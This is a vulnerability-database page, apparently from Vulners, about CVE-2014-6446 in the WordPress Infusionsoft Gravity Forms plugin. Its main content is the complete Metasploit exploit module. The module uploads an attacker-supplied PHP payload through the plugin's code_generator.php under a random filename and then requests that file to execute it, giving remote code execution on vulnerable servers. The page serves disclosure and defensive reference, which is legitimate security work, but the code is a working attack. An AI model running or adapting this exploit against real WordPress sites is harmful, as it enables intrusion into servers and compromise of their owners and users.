Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Wordpress InfusionSoft Plugin Upload Vulnerability

🗓️ 10 Oct 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 23 Views

Wordpress InfusionSoft Plugin Upload Vulnerability This module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file upload and remote code execution

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Wordpress InfusionSoft Upload Exploit
9 Oct 201400:00
zdt
Gitee		Exploit for OS Command Injection in Gnu Bash
27 Jul 202504:29
gitee
Circl		CVE-2014-6446
9 Oct 201400:00
circl
CVE		CVE-2014-6446
26 Sep 201421:00
cve
Cvelist		CVE-2014-6446
26 Sep 201421:00
cvelist
Exploit DB		WordPress Plugin InfusionSoft - Arbitrary File Upload (Metasploit)
9 Oct 201400:00
exploitdb
Metasploit		Wordpress InfusionSoft Upload Vulnerability
23 Mar 201507:15
metasploit
NVD		CVE-2014-6446
26 Sep 201421:55
nvd
OpenVAS		WordPress Infusionsoft Gravity Forms Add-on Arbitrary File Upload Vulnerability
29 Sep 201400:00
openvas
Packet Storm		Wordpress InfusionSoft Upload
9 Oct 201400:00
packetstorm
Rows per page

                                                ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::HTTP::Wordpress
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress InfusionSoft Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary PHP code upload in the wordpress Infusionsoft Gravity
        Forms plugin, versions from 1.5.3 to 1.5.10. The vulnerability allows for arbitrary file
        upload and remote code execution.
      },
      'Author'         =>
        [
          'g0blin',                    # Vulnerability Discovery
          'us3r777 <[email protected]>'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2014-6446'],
          ['URL', 'http://research.g0blin.co.uk/cve-2014-6446/'],
          ['WPVDB', '7634']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Infusionsoft 1.5.3 - 1.5.10', {}]],
      'DisclosureDate' => 'Sep 25 2014',
      'DefaultTarget'  => 0)
    )
  end
 
  def check
    res = send_request_cgi(
      'uri'    => normalize_uri(wordpress_url_plugins, 'infusionsoft', 'Infusionsoft', 'utilities', 'code_generator.php')
    )
 
    if res && res.code == 200 && res.body =~ /Code Generator/ && res.body =~ /Infusionsoft/
      return Exploit::CheckCode::Detected
    end
 
    Exploit::CheckCode::Safe
  end
 
  def exploit
    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
    res = send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', 'code_generator.php'),
      'method'    => 'POST',
      'vars_post' =>
      {
        'fileNamePattern' => php_pagename,
        'fileTemplate'    => payload.encoded
      }
    })
 
    if res && res.code == 200 && res.body && res.body.to_s =~ /Creating File/
      print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...")
      register_files_for_cleanup(php_pagename)
    else
      fail_with("#{peer} - Unable to deploy payload, server returned #{res.code}")
    end
 
    print_status("#{peer} - Calling payload ...")
    send_request_cgi({
      'uri'       => normalize_uri(wordpress_url_plugins, 'infusionsoft',
                     'Infusionsoft', 'utilities', php_pagename)
    }, 2)
  end
 
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Oct 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.82212
wordpressinfusionsoftpluginuploadvulnerabilitygravity formsarbitrary php coderemote code executioncve-2014-6446phpfile uploadmetasploit
23